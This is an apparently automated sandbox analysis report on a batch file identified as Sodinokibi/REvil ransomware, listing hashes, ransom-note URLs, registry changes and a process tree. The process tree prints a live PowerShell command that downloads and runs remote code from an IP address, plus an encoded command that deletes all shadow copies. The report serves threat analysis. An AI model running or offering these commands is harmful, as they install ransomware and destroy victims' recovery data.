Analysis
-
max time kernel
108s -
max time network
107s -
platform
windows7_x64 -
resource
win7v200410 -
submitted
19-04-2020 18:10
Static task
static1
Behavioral task
behavioral1
Sample
ugeUxUR2.bat
Resource
win7v200410
Behavioral task
behavioral2
Sample
ugeUxUR2.bat
Resource
win10v200410
General
-
Target
ugeUxUR2.bat
-
Size
192B
-
MD5
b32a8a9b873bddb42382092e73e27ef6
-
SHA1
b539fa06c5d88d392f9740b248b692cd129f46d6
-
SHA256
05633aab23dbf5e891b0ab97f4a85b00be890dd17a96ed1a7caed9ebbbd27f04
-
SHA512
62730a9ccfdf743b9b49e413d57e1fdd4edfe875070d11a5e5688be94e6dad964ef7f83e25fcaa1c39ffdee783ad49dcf7e53aa5eca300175ef2e32316413dbc
Malware Config
Extracted
http://185.103.242.78/pastes/ugeUxUR2
Extracted
C:\35k679233-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/0880BDF2560BC8CF
http://decryptor.cc/0880BDF2560BC8CF
Signatures
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1188 powershell.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 3 1188 powershell.exe -
Makes http(s) request 1 IoCs
Contacts server via http/https, possibly for C2 communication.
Processes:
description flow ioc HTTP URL 3 http://185.103.242.78/pastes/ugeUxUR2 -
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1120 wrote to memory of 1188 1120 cmd.exe powershell.exe PID 1188 wrote to memory of 1652 1188 powershell.exe powershell.exe PID 1188 wrote to memory of 1652 1188 powershell.exe powershell.exe PID 1188 wrote to memory of 1652 1188 powershell.exe powershell.exe PID 1188 wrote to memory of 1652 1188 powershell.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1188 powershell.exe Token: SeDebugPrivilege 1188 powershell.exe Token: SeDebugPrivilege 1652 powershell.exe Token: SeBackupPrivilege 1792 vssvc.exe Token: SeRestorePrivilege 1792 vssvc.exe Token: SeAuditPrivilege 1792 vssvc.exe Token: SeTakeOwnershipPrivilege 1188 powershell.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid process 1188 powershell.exe 1188 powershell.exe 1188 powershell.exe 1652 powershell.exe 1652 powershell.exe -
Drops file in Program Files directory 16 IoCs
Processes:
powershell.exedescription ioc process File created \??\c:\program files\35k679233-readme.txt powershell.exe File opened for modification \??\c:\program files\EnableSync.edrwx powershell.exe File opened for modification \??\c:\program files\SaveRepair.emz powershell.exe File opened for modification \??\c:\program files\UpdateUnpublish.xht powershell.exe File created \??\c:\program files (x86)\35k679233-readme.txt powershell.exe File opened for modification \??\c:\program files\DisableUndo.au3 powershell.exe File opened for modification \??\c:\program files\JoinClear.pptm powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\35k679233-readme.txt powershell.exe File opened for modification \??\c:\program files\CompleteUninstall.dotx powershell.exe File opened for modification \??\c:\program files\ConvertToRestore.ttc powershell.exe File created \??\c:\program files\microsoft sql server compact edition\35k679233-readme.txt powershell.exe File opened for modification \??\c:\program files\RegisterUnregister.mpg powershell.exe File opened for modification \??\c:\program files\LimitGrant.snd powershell.exe File opened for modification \??\c:\program files\SuspendGet.odt powershell.exe File opened for modification \??\c:\program files\SwitchUnprotect.wm powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\35k679233-readme.txt powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\lw595b79i92.bmp" powershell.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\ugeUxUR2.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1120 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/ugeUxUR2');Invoke-IZLSKUWOR;Start-Sleep -s 10000"2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Blacklisted process makes network request
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Drops file in Program Files directory
- Sets desktop wallpaper using registry
PID:1188 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1652
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1792